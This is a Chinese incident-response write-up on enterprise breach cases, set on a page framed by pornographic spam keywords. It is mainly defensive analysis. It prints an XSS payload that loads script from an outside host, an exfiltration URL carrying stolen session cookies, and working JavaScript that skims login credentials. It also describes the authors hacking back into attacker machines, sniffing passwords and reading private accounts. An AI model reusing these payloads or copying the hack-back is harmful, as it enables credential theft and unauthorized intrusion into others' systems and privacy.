精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

“企業應急響應和反滲透”之真實案例分析

安全 黑客攻防
對于企業應急響應,我想只要從事安全工作的同學都有接觸,我也一樣,在甲方乙方工作的這幾年,處理過不少應急響應的事件,但是每個人都會有自己做事的方法,在這里我主要分享一下我對應急響應的理解以及對碰到的一些案例。

峰會上講過的議題,整理成文章,以供大家批評指正。

對于企業應急響應,我想只要從事安全工作的同學都有接觸,我也一樣,在甲方乙方工作的這幾年,處理過不少應急響應的事件,但是每個人都會有自己做事的方法,在這里我主要分享一下我對應急響應的理解以及對碰到的一些案例。

0x00 什么時候做應急響應?

應急響應,估計最近幾年聽到這個詞更多是因為各大甲方公司開始建設和運營自己的應急響應平臺,也就是 xSRC。看起來對報告到這些地方的漏洞進行處理就已經成為企業應急響應的主要工作,但是以我之前在甲方親自參與建設應急響應平臺和去其他企業應急響應平臺提交漏洞的經驗來看,能真正把平臺上的漏洞當時應急響應事件去處理的寥寥無幾,更多的只是:接收->處理這種簡單重復的流水線工作。因為他們會覺得報告到這些地方的漏洞它的風險是可控的。

我理解的應急響應是對突發的未知的安全事件進行應急響應處理。這種情況一般都是“被黑”了。“被黑”包括很多種:服務器被入侵,業務出現蠕蟲事件,用戶以及公司員工被釣魚攻擊,業務被 DDoS 攻擊,核心業務出現DNS、鏈路劫持攻擊等等等等。

0x01 為什么做應急響應?

我在峰會上說是被逼的,雖然只是開個玩笑,但是也能夠反映出做應急響應是一件苦差事,有的時候要做到 7*24 小時響應,我覺得是沒人喜歡這么一件苦差事的,但是作為安全人員這是我們的職責。

那說到底我們為什么做應急響應呢,我覺得有以下幾個因素:

保障業務
還原攻擊
明確意圖
解決方案
查漏補缺
司法途徑

對于甲方的企業來說業務永遠是第一位的,沒有業務何談安全,那么我們做應急響應首先就是要保障業務能夠正常運行,其次是還原攻擊場景,攻擊者是通過什么途徑進行的攻擊,業務中存在什么樣的漏洞,他的意圖是什么?竊取數據?炫耀技術?當我們了解到前面的之后就需要提出解決方案,修復漏洞?還是加強訪問控制?增添監控手段?等等,我們把當前的問題解決掉之后,我們還需要查漏補缺,來解決業務中同樣的漏洞?最后就是需不需要司法的介入。

0x02 怎么做應急響應?

具體怎么做應急響應,我之前根據自己做應急響應的經驗總結幾點:

確定攻擊時間
查找攻擊線索
梳理攻擊流程
實施解決方案
定位攻擊者

確定攻擊時間能夠幫助我們縮小應急響應的范圍,有助于我們提高效率,查找攻擊線索,能夠讓我們知道攻擊者都做了什么事情,梳理攻擊流程則是還原整個攻擊場景,實施解決方案就是修復安全漏洞,切斷攻擊途徑,最后就是定位攻擊人,則是取證。

ps:定位攻擊者,我覺得羅卡定律說的挺好的:凡有接觸,必留痕跡。

0x03 為什么做反滲透?

一方面我們可以把被動的局面轉變為主動的局面,在這種主動的局面下我們能夠了解到攻擊者都對我們做了什么事情,做到什么程度,他下一步的目標會是什么?最關鍵的我們能夠知道攻擊者是誰。

那么具體怎么做呢?就要用攻擊者的方法反擊攻擊者。說起來簡單,做起來可能就會發現很難,但是我們可以借助我們自身的優勢,通過業務數據交叉對比來對攻擊者了解更多,甚至可以在攻擊者的后門里面加上攻擊代碼等。#p#

0x04 案例之官微帳號被盜

這是第一個案例,是官方微博帳號被盜的案例。首先看下面兩張圖片: 

enter image description here 

 

enter image description here 

某天我們的一個官方帳號突發連續發兩條不正常的微博內容,看到第一條的時候還以為是工作人員小手一抖,test 到手,以為是工作人員的誤操作,但是看到第二條微博的時候就已經能夠判斷帳號出了問題,具體是什么問題只能通過后面的分析才知道。

但是肯定的是這不是工作人員進行的操作,一方面在這種重要帳號的操作上有一些制度,其次是發布的內容也比較明顯,根據發布的時間通過后臺系統分析,該帳號有通過 cookie 在非公司 IP 進行過登錄,但是我們的 cookie 是通過 httponly 進行保護的,how?

接下來鎖定那個時間段操作過官方微博帳號同事的工作電腦,在其使用的火狐瀏覽器中發現有下面連續的幾條訪問記錄:

  1. ==================================================  
  2. URL               : http://t.cn/zW*bUQ  
  3. Last Visit Date   : 2012-7-16 19:22:27 
  4. ==================================================  
  5.  
  6. ==================================================  
  7. URL               : http://50.116.13.242/index.php  
  8. Last Visit Date   : 2012-7-16 19:22:28  
  9. Referrer          : http://t.cn/zW*bUQ 
  10. ==================================================  
  11.  
  12. ==================================================  
  13. URL               : http://**.***.com/_common/jwplayer/player.swf?debug=(function(){location.href=%27javascript:%22%3Cscript/src=http://50.*.*.242/e.js%3E%3C/script%3E%22%27})  
  14. Last Visit Date   : 2012-7-16 19:22:28  
  15. Referrer          : http://50.116.13.242/index.php  
  16. Title             : player.swf (application/x-shockwave-flash 對象)  
  17. ==================================================  
  18.  
  19. ==================================================  
  20. URL               : http://50.116.13.242/e.php?opener=0&cookie=ULV%3D1342421444188%3A342%3A12%3A1%3A306588567000.3021.1342421444076%3A1342141514702%3B%20__utma%3D182865017.844076418.1336462885.1341536058.1341543017.15%3B%20__utmz%3D182865017.1341473198.13.8.utmcsr%3Dweibo.com%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D/breakingnews%3B%20vjuids%3Ddae3c1e13.1369ca9b037.0.1a9eb5f46e6ac8%3B%20vjlast%3D1334068228.1341096989.11%3B%20UOR%3D%2C%2C%3B%20un%3D*@sina.com%3B%20wvr%3D3.6%3B%20_s_tentry%3Dnews.sina.com.cn%3B%20Apache%3D306588567000.3021.1342421444076%3B%20SINAGLOBAL%3D306588567000.3021.1342421444076%3B%20SUS%3DSID-1618051664-1342421545-XD-z8hcn-efefbc9f4464bf215caf1d6b0da488bf%3B%20SUE%3Des%253D5937b4f4509871fc45195767ea7abe37%2526ev%253Dv1%2526es2%253Da42f0190f7b1f5137f761f625bbe0e81%2526rs0%253DpnLlydVz7IsdBcHbRCS8Tdb1KmHl7c%25252F758lHMKQRftFZBm9EDKoFVF7jexRKPF8CpY3rjGOora0pZ%25252FyDJSaDWJxRQn020MpsJxXhf5NdP2h3jfo2V%25252FoQgA0olYEWGJNQIDFZDfkndhSSXCp%25252BldHRW%25252BkEMwhvhY4p3xR0Ki5ja94%25253D%2  
  21. Last Visit Date   : 2012-7-16 19:22:31  
  22. Referrer          : http://**.***.com/_common/jwplayer/player.swf?debug=(function(){location.href=%27javascript:%22%3Cscript/src=http://50.*.*.242/e.js%3E%3C/script%3E%22%27})  
  23. ================================================== 

對上面的訪問記錄我想我不需要做太多的解釋。在官方微博帳號的私信里面有 http://t.cn/zW*bUQ 的私信記錄。

到這里就已經能夠還原整個攻擊場景了

工作人員收到一條私信,并且打開了

私信鏈接是一個 xss 漏洞的鏈接

攻擊代碼利用另外一個業務的 apache httponly cookie 泄露漏洞竊取到 cookie

事后我們修復了這次攻擊中的漏洞,同時修復了業務中同類的安全漏洞,同時加強了員工安全意識,并且增加了相應的帳號安全策略。

最后我們通過后臺的 IP 和郵箱等數據定位到了攻擊者,在整個攻擊中也并沒有惡意,他也把相關的漏洞和攻擊過程提交到烏云漏洞報告平臺,大家可以去主站找找這個漏洞,我這里就不貼相關鏈接了。#p#

0x05 案例之 500 錯誤日志引發的血案

首先看下圖 

enter image description here 

一天 QA 發來郵件詢問一個比較異常的事情,某測試業務出現多條狀態碼為 500 的日志,QA 懷疑是有黑客攻擊,我們開始介入進行分析。

500 錯誤代表文件真實存在過并且被人訪問執行過,但是現在文件已經被刪除了,通過文件名可以判斷并非是業務需要的文件,被黑的可能性比較大,然后找來 TOMCAT 和前端 Nginx 日志查看的確被上傳了 webshell。 

enter image description here 

根據攻擊者 IP 和時間等線索通過分析 nginx 和 tomcat 的日志可以確定攻擊者是通過 tomcat 的管理后臺上傳的 webshell,并且通過 webshell 做了許多操作 

enter image description here 

但是tomcat 帳號密碼并非弱密碼,how?我們接下來對全網的 tomcat 進行了排查,發現在其中一臺內網服務器存在 tomcat 弱口令,并且帳號配置文件中含有攻擊者使用的帳號和密碼,只是這臺服務器較早之前下線了公網 IP,只保留內網 IP,并且通過分析這臺服務器的日志,能夠判斷攻擊者之前就已經通過弱口令拿到了服務器權限,并且收集了服務器上的用戶名和密碼等信息。

我們想看看攻擊者到底想干什么,對之前收集的攻擊者 IP 進行反滲透,用“黑客”的方法拿到香港,廊坊多臺攻擊者肉雞權限,肉雞上發現了大量黑客工具和掃描日志,在其中一臺肉雞上發現我們內網仍有服務器被控制。

下面兩張圖片可以看到攻擊者通過 lcx 中轉了內網的反彈 shell 

enter image description here 
enter image description here 

那么到目前為止我們做了哪些事情呢?

清理后門

清理全網 tomcat

梳理全網 web 目錄文件

修改業務相關帳號密碼

修改業務關鍵代碼

加強 IDC 出口策略

部署 snort

做了好多事情?可是事實上呢?事情并沒有我們想的那么簡單。

之前的安全事件剛過不久,IT 人員反饋域控服務器異常,自動重啟,非常異常。登錄域控進行排查原因,發現域控被植入了 gh0st 后門。 

enter image description here 

域控被控制,那域控下面的服務器的安全性就毫無保障,繼續對辦公網所有的 windows 服務器排查,發現多臺 Windows 服務器被植入后門,攻擊的方法是通過域控管理員帳號密碼利用 at 方式添加計劃任務。

能夠知道攻擊者是如何入侵的域控服務器比較關鍵,對域控服務器的日志進行分析發現下面可疑的日志:

2011-11-10,14:03:47,Security,審核成功,登錄/注銷 ,540,*\*,PDC,”成功的網絡登錄:
用戶名:    *.ad
域:      *
登錄 ID:      (0x0,0x1114E11)
登錄類型:   3
登錄過程:   NtLmSsp
身份驗證數據包:    NTLM
工作站名:   CC-TEST-V2
登錄 GUID:    -
調用方用戶名: -
調用方域:   -
調用方登錄 ID:   -
調用方進程 ID: -
傳遞服務: -
源網絡地址:  192.168.100.81
源端口:    0

2011-11-10,3:13:38,Security,審核失敗,帳戶登錄 ,680,NT AUTHORITY\SYSTEM,PDC,"嘗試  登錄的用戶:  MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
登錄帳戶:   QM-*$
源工作站:   CC-TEST-V2
錯誤代碼:   0xC000006A
"
2011-11-10,3:13:38,Security,審核失敗,帳戶登錄 ,680,NT AUTHORITY\SYSTEM,PDC,"嘗試  登錄的用戶:  MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
登錄帳戶:   QM-*$
源工作站:   CC-TEST-V2
錯誤代碼:   0xC000006A

結合之前的信息能夠鎖定 192.168.100.81 是攻擊源,遂對這臺服務器進行確認,結果有點令人吃驚:

這是一臺虛擬機,運行在一臺普通的 PC 機上,這臺 PC 機就放在業務部門同事的腳底下,這臺虛擬機本身啟用了 3389,存在弱口令,我們之前在對內網安全檢查時,這臺虛擬機處于關機狀態。由于這臺虛擬機上面跑的有測試業務,域控管理員曾經登錄過。

綜合我們之前得到的信息可以確定這臺虛擬機是攻擊者入侵我們辦公網的第一臺服務器,通過把這個虛擬機作為跳板攻擊辦公網其他服務器,至于這臺虛擬機是如何被入侵的,我們后面也確定是因為上次的攻擊事件,攻擊者通過 IDC 進入到的辦公網。

我們又做了什么?

排查所有 windows 服務器

對之前確定被入侵的服務器重裝,包括域控

snort 上加了 gh0st 的特征

snort 加上 gh0st 的特征后不久我們就發現我們辦公網還有服務器被控制 

enter image description here 

對這臺服務器進行清理后,我們仍然沒有放棄對攻擊者的反滲透,這次我們發現攻擊者還有美國的 IP,對其滲透,最終通過 c 斷進行 cain 嗅探到 3389 的密碼。

登錄到這臺美國 IP 的服務器后,發現上面運行著 gh0st 的控制端,我們內網仍然有一臺服務器處于上線狀態。 

enter image description here 

其實到這里這次事件就能告一段落了,關于攻擊者我們在這臺美國的服務器上發現了攻擊者的多個 QQ 和密碼,登錄郵箱后找到了攻擊者的簡歷等私人信息,還有就是我們之前也獲取到攻擊者在國內某安全論壇帳號。其實到這里我們能夠確定攻擊者是誰了。 

enter image description here 
enter image description here #p#

0x06 案例之永無止境的劫持

對于劫持我想大家都不陌生,我們在生活中比較常見到的就是運營商在頁面中插入廣告等代碼,這種就是一種劫持攻擊。

回到案例本身,我們的一個業務先后出現多次多種手段的劫持攻擊,一次是 dns 劫持,把業務的域名劫持到 61.* 這個 ip 上,另外一次是鏈路劫持,替換服務器返回給用戶的 http 響應內容,這兩次的目的都一樣就是在登錄口添加 js 代碼,用于竊取用戶的用戶名和明文密碼。我們另外一個業務也遭受鏈路劫持,直接替換客戶投放的廣告代碼,給業務造成很大的經濟損失。

下面兩個圖是我們業務監控系統和基調的截圖,上面的圖可以很明顯看到在 9:30 用戶登錄成功數明顯下降,持續不到一個小時,下圖是全國部分地區基調的數據,可以看到域名被明顯劫持到 61 這個 ip,這是一次典型的 DNS 攻擊。 

enter image description here  
enter image description here 

頁面中被插入的攻擊核心代碼

  1. //獲取用戶名和密碼  
  2. function ffCheck() {  
  3.     try {  
  4.         try {  
  5.             var u = null != f ? f.idInput.value : document.getElementById("idInput").value;  
  6.         } catch (e) {  
  7.             var u = (document.getElementById("idInput").innerHTML).replace(/\s/g, "");  
  8.         }  
  9.         var p = null != f ? f.pwdInput.value : document.getElementById("pwdInput").value;  
  10.         if (u.indexOf("@") == -1) u += "@xxx.com";  
  11.         try {  
  12.             if (u.indexOf("@") == -1) uu = u + getdomain();  
  13.         } catch (e) {}  
  14.         sendurl("/abc", u, p, "coremail");  
  15.     } catch (e) {}  
  16.     return fOnSubmit();  
  17. }  
  18.    
  19. 通過 ajax 發送出去  
  20. function sendurl(uri, u, p, i) {  
  21. xmlHttp = GetXmlHttpObject();  
  22. if (xmlHttp == null) {  
  23.     return;  
  24. }  
  25. param = "user=" + u + "&pass=" + p + "&icp=" + i;  
  26. xmlHttp.onreadystatechange = stateChanged;  
  27. try {  
  28.     xmlHttp.open("POST", uri + "?t=" + (new Date()).valueOf(), true);  
  29. } catch (e) {}  
  30. xmlHttp.setRequestHeader("If-Modified-Since", "0");  
  31. xmlHttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");  
  32. xmlHttp.send(param);  

接下來看下面兩張圖片 

enter image description here  
enter image description here

 

這是一次典型的鏈路劫持攻擊,通過 ttl 就能夠判斷,攻擊的結果和前面提到的 dns 劫持攻擊類似,插入惡意 js 代碼來獲取用戶的用戶名和密碼。

對于劫持攻擊的處理過程,首先是判斷是什么攻擊,對于鏈路劫持目前的鏈路劫持好像大部分都是旁路的攻擊方式,就可以通過 ttl 來定位,默認的 ttl 值很好判斷,如果可以修改的 ttl 值,可以通過遞增或者遞減 ttl 的方式來判斷,dns 劫持就是判斷攻擊方式是什么,哪些 dns 受影響,劫持的 ip 是什么運營商,劫持后做了什么事情。

其次是解決攻擊,一般根據劫持的情況去聯系運營商,聯系有關部門等,但是然并卵,有的功能投訴很有效,比如劫持廣告代碼,有的攻擊則沒有任何作用,比如注入 js 代碼獲取用戶名和密碼。

其實我們能做的畢竟有限,完善監控,當劫持發生的時候能夠第一時間獲知,甚至提醒用戶當前環境有劫持的風險,對部分業務使用 https,但是我覺得都不能根治這些問題。怎么才能解決劫持問題,我沒有好的解決方案,在這里我把這類案例分享出來是希望能夠和各位進一步探討。

0x07 總結

總結這里我就不打算寫太多,我覺得有幾個大的方向作為指導:

從業務角度,保障業務肯定是應急響應的前提;

從對抗角度,知己知彼百戰不殆;

從技術角度,只有更多的了解攻擊才能更好的做到防御;

責任編輯:藍雨淚 來源: 烏云知識庫
相關推薦

2016-08-30 10:56:48

2023-07-07 06:53:56

遠程軟件日志向日葵

2019-06-17 11:10:29

Linux工具應急響應

2019-10-24 10:28:06

2009-07-04 11:26:12

unix應急安全攻略

2019-05-21 14:33:01

2019-05-15 10:05:19

主機安全Linux安全系統安全

2023-08-23 10:29:24

2020-12-24 09:46:07

Linux命令服務器

2023-03-03 14:07:06

2020-12-16 14:22:56

托管數據中心數據中心IT硬件

2019-08-07 22:01:34

網絡安全應急響應

2015-01-26 17:25:08

應急響應預案企業安全風險

2021-01-18 08:10:35

安全工具病毒

2019-11-11 10:55:46

Linux 系統 數據

2019-05-23 10:11:02

Linux安全檢查應急響應

2022-03-18 14:11:05

安全事件安全分析威脅

2017-05-13 21:34:14

勒索攻擊蠕蟲勒索軟件

2011-06-28 07:45:00

開發測試云微軟研究院云計算案例

2023-12-13 10:41:00

IoT 設備網絡智能 HVAC能源效率
點贊
收藏

51CTO技術棧公眾號

亚洲视频1区2区| 久久99精品久久久久久| 亚洲欧美成人网| 国产一级做a爰片久久| 69xxx在线| 91在线免费播放| 国产精品亚洲欧美导航| 国产精品成人免费一区二区视频| 奇米狠狠一区二区三区| 欧美巨大另类极品videosbest | 国产精品视频500部| 天天综合网久久综合网| 国产精品久久天天影视| 亚洲黄色在线观看| 天天色天天综合网| 麻豆mv在线观看| 亚洲丝袜另类动漫二区| 蜜桃视频成人| 黄色a在线观看| 极品美女销魂一区二区三区| 午夜免费日韩视频| 四虎免费在线视频| 欧美色蜜桃97| 日韩精品视频在线观看免费| 国产不卡的av| 精品3atv在线视频| 精品久久在线播放| 成人在线观看www| 永久免费av在线| 99久久久精品免费观看国产蜜| 成人精品一区二区三区| 国产精品欧美综合| 久久久久国产精品一区三寸| 欧美黑人xxxx| www.99re7| 日韩免费一区| 国产亚洲精品一区二区| 国产精品久久久久久久无码| 免费一级欧美在线大片| 欧美嫩在线观看| 国产又黄又猛又粗又爽的视频| 9i看片成人免费高清| 综合亚洲视频| 中文字幕欧美视频在线| 中文字幕一区二区三区人妻电影| aiss精品大尺度系列| 日韩亚洲电影在线| 特级西西444www| 国产精品亚洲欧美日韩一区在线 | www.久久伊人| 国产酒店精品激情| 97超碰人人模人人爽人人看| 国产精品视频a| 精品亚洲成av人在线观看| 91精品国产综合久久久久久蜜臀| 69av视频在线观看| 日韩高清一级片| 国产精品视频xxx| 国产精品成人久久久| 日韩精品一二三| 国产精品激情自拍| 中文字幕一区二区久久人妻| 开心九九激情九九欧美日韩精美视频电影 | 久久久香蕉视频| 精品不卡视频| 69av在线视频| 波多野结衣黄色网址| 日韩不卡手机在线v区| 国产精品爱啪在线线免费观看| 中文字幕激情小说| 日本视频中文字幕一区二区三区| 国产精品成人一区二区三区吃奶| 综合久久中文字幕| 国产精品91xxx| 国产欧美在线一区二区| 天堂v视频永久在线播放| 久久免费国产精品| 亚洲高清在线观看一区| 成人影欧美片| 天天综合网 天天综合色| 欧美爱爱视频免费看| 自拍偷自拍亚洲精品被多人伦好爽| 91成人在线免费观看| 中文字幕丰满乱码| 国产成人精品福利| 亚洲人成网站在线播| avhd101老司机| 午夜视频精品| 日韩美女免费视频| 国产视频第二页| 91社区在线播放| 一区二区三区欧美成人| brazzers在线观看| 欧美写真视频网站| 日韩黄色一区二区| 欧美日韩国产传媒| 欧美激情极品视频| 黄色av网站免费| 国产成人免费视频精品含羞草妖精| 久久久久网址| av在线麻豆| 日本大香伊一区二区三区| 国产精品探花在线播放| 亚洲图片久久| 欧美贵妇videos办公室| 波多野结衣在线电影| 国产精品99久| 亚洲一区三区在线观看| 在线一区av| 日韩欧美色综合网站| 人人妻人人澡人人爽| 亚洲国产一区二区三区高清| 国产精品影片在线观看| 日本视频在线观看一区二区三区| 亚洲免费观看高清在线观看| 国产精品亚洲二区在线观看 | 欧美一级免费观看| 极品久久久久久久| 香蕉久久国产| 国产乱码精品一区二区三区中文| 免费高清完整在线观看| 色综合天天综合网天天狠天天 | 国产亚洲自拍一区| 国产一区二区三区小说| 婷婷久久综合九色综合99蜜桃| 亚洲欧美一区二区三区情侣bbw | 欧美高清日韩| 国产精品自产拍高潮在线观看| 亚洲人视频在线观看| 亚洲午夜久久久久中文字幕久| 天天干天天色天天干| 波多野结衣在线观看一区二区三区| 午夜美女久久久久爽久久| 国产三级按摩推拿按摩| 国产精品久线观看视频| 免费大片在线观看| 国产欧美日韩精品高清二区综合区| 国模精品视频一区二区三区| 亚洲奶汁xxxx哺乳期| 亚洲在线观看免费视频| 亚洲精品久久久久久| 五月综合激情| 91精品在线一区| 黄色动漫在线| 日韩你懂的在线播放| 杨钰莹一级淫片aaaaaa播放| 国内成人免费视频| 色婷婷777777仙踪林| 欧一区二区三区| 欧美大片欧美激情性色a∨久久| 国产探花精品一区二区| 亚洲欧美激情一区二区| 韩国三级丰满少妇高潮| 欧美福利在线| 国产日本一区二区三区| 九色porny视频在线观看| 日韩精品免费在线视频| aaa在线视频| 国产精品嫩草99a| 亚洲综合伊人久久| 欧美激情自拍| 久久精品日产第一区二区三区精品版| 国产在线看片免费视频在线观看| 一区二区三区影院| 日本女人性视频| 好看的av在线不卡观看| 国内精品国语自产拍在线观看| 国产夫妻在线| 亚洲图片欧美午夜| 亚洲一区 中文字幕| 亚洲色图一区二区三区| 日批视频免费看| 国产精品乱看| 日日夜夜精品网站| 精品成人18| 久久青草福利网站| 邻家有女韩剧在线观看国语| 欧美日韩中文字幕精品| 欧美成人精品欧美一级私黄| 成人av网址在线观看| www黄色av| 97精品国产| 鬼打鬼之黄金道士1992林正英| 日本а中文在线天堂| 中文字幕亚洲天堂| 亚洲AV无码国产精品午夜字幕 | 久久亚洲精品一区| 日韩在线一区二区三区四区| 色就色 综合激情| 午夜爱爱毛片xxxx视频免费看| 不卡的av电影| 超碰人人草人人| 一本综合久久| 欧美 另类 交| 欧美美乳视频| 99三级在线| 成人国产精品| 97精品国产91久久久久久| 一级毛片视频在线观看| 精品国产成人系列| 中文字幕在线视频免费| 午夜视频在线观看一区| 四虎影视1304t| 91欧美一区二区| 色欲无码人妻久久精品| 日韩国产高清影视| 日本一区午夜艳熟免费| 日韩精品永久网址| 久久久久久久久久久久久久一区| 99久久这里有精品| 国产成人综合一区二区三区| 色屁屁www国产馆在线观看| 亚洲性夜色噜噜噜7777| 人人妻人人澡人人爽精品日本| 欧美日韩一二三| 高清乱码免费看污| 亚洲高清不卡在线观看| 黄色录像一级片| 欧美高清在线一区二区| 亚洲中文字幕一区| 国产.欧美.日韩| 亚洲精品国产一区二区三区| 三级影片在线观看欧美日韩一区二区 | 精品国产31久久久久久| 欧美日韩在线国产| 国产精品美女久久久久aⅴ国产馆| 在线观看av中文字幕| 成人精品一区二区三区四区| 三日本三级少妇三级99| 日本不卡一区二区三区| 欧美 激情 在线| 国产精品亚洲综合色区韩国| 精品国偷自产一区二区三区| 欧美日本亚洲韩国国产| 久久香蕉视频网站| 欧美日韩视频| 亚洲中文字幕无码一区二区三区| 91精品国产乱码久久久久久久| 涩涩涩999| 精品无人区麻豆乱码久久久| 欧美在线播放一区| 伊人精品一区| 日本在线成人一区二区| 亚洲小说图片| 欧美一区二区三区成人久久片| 婷婷成人在线| 欧美一区国产一区| 国产欧美一区二区精品久久久| 欧美日韩高清在线一区| 免费一区二区三区视频导航| 欧美在线3区| 日本欧美肥老太交大片| 亚洲成人自拍视频| 国产精品久久久久久久| 国产盗摄视频在线观看| 欧美激情麻豆| www精品久久| 欧美亚洲自偷自偷| 毛片一区二区三区四区| 日韩av成人高清| 一道本在线免费视频| 久久99精品国产.久久久久久| 亚洲第一色av| 成人免费视频视频在线观看免费| yy6080午夜| 久久精品视频一区二区| 黑人狂躁日本娇小| 一区二区三区四区高清精品免费观看 | 精品乱码一区二区三四区视频| 亚洲视频网站在线观看| 瑟瑟视频在线| 欧美激情中文字幕乱码免费| 成入视频在线观看| 国产精品h片在线播放| 亚洲资源在线| 狠狠色综合欧美激情| 久久成人av| 99精品一级欧美片免费播放| 尹人成人综合网| 四季av一区二区| 国产福利视频一区二区三区| 欧美大片免费播放器| 国产精品污网站| 国产一级黄色av| 91精品福利视频| japanese国产| 亚洲欧美日韩在线高清直播| av在线播放国产| 日本久久久久亚洲中字幕| 四虎成人精品一区二区免费网站| 国产欧美一区二区三区不卡高清| 国产一区二区三区四区五区传媒| 大陆极品少妇内射aaaaaa| 国产精品久久久久毛片大屁完整版| 男人添女人下面免费视频| www.亚洲激情.com| 五月综合色婷婷| 色偷偷一区二区三区| 精品国产乱码久久久久久蜜臀网站| 日韩高清a**址| 亚洲精品一线| 国产精品一二三在线| 99re6热只有精品免费观看| 亚洲在线色站| 久久久久看片| 亚洲无人区码一码二码三码| 国产精品久久国产精麻豆99网站| 国偷自拍第113页| 日韩美女视频一区二区在线观看| 国产精品影院在线| 97avcom| 视频一区在线| 最近中文字幕免费mv| 丝袜美腿一区二区三区| 久久午夜夜伦鲁鲁片| 亚洲精品欧美二区三区中文字幕| 国产成人一级片| 亚洲成人国产精品| 草莓福利社区在线| 国产一区香蕉久久| 欧洲乱码伦视频免费| 国产又黄又大又粗视频| 成人一区二区在线观看| 欧美爱爱免费视频| 欧美日韩美少妇| 1024免费在线视频| 国产精品aaaa| 中文字幕中文字幕精品| 日韩日韩日韩日韩日韩| 国产成人午夜高潮毛片| 日韩精品一区二区三区在线视频| 欧美性色欧美a在线播放| 你懂的免费在线观看视频网站| 久久免费高清视频| jazzjazz国产精品久久| 日韩中文字幕亚洲精品欧美| 激情国产一区二区 | 99视频精品全部免费在线视频| 韩国日本在线视频| 91丝袜呻吟高潮美腿白嫩在线观看| 九九九国产视频| 亚洲大胆美女视频| 福利影院在线看| 久久精品人成| 日韩激情在线观看| 调教驯服丰满美艳麻麻在线视频| 色乱码一区二区三区88| 高清av电影在线观看| 国产精品户外野外| 日韩黄色大片| 婷婷中文字幕在线观看| 亚洲欧美韩国综合色| 亚洲AV无码精品自拍| 高清欧美性猛交| 日韩激情网站| 中文字幕永久视频| ●精品国产综合乱码久久久久| 国产乱码一区二区| 色中色综合影院手机版在线观看| www国产精品| 欧美日韩亚洲一| 中文字幕国产一区二区| 国产精品一区二区av白丝下载 | 欧美国产日韩在线观看成人| 欧美一级黄色录像| av影视在线| 日韩资源av在线| 国产一区二区视频在线播放| 麻豆国产尤物av尤物在线观看| 欧美精品一区二| 91精品影视| 水蜜桃在线免费观看| 风间由美一区二区三区在线观看| 亚洲欧美在线观看视频| 国产亚洲欧美aaaa| 国产一区二区三区亚洲综合| 国产人妻777人伦精品hd| 久久久一区二区| 国产日韩在线观看一区| 97超级碰碰碰久久久| 日韩免费高清| 国产高清成人久久| 欧美午夜影院一区| 国产精品—色呦呦| 日本不卡一区二区三区视频| 韩国av一区二区三区四区| 羞羞影院体验区| 啊v视频在线一区二区三区| 丁香婷婷成人| 日韩av片网站| 午夜精品久久久久久久久久久 | 精品成人影院| 欧美性猛交xx| 欧美性xxxx极品hd欧美风情| 欧美日韩xx| 欧美午夜精品久久久久久蜜| 韩国v欧美v亚洲v日本v| 精品国产午夜福利| 欧美激情精品久久久久久黑人| 国产成人精品999在线观看|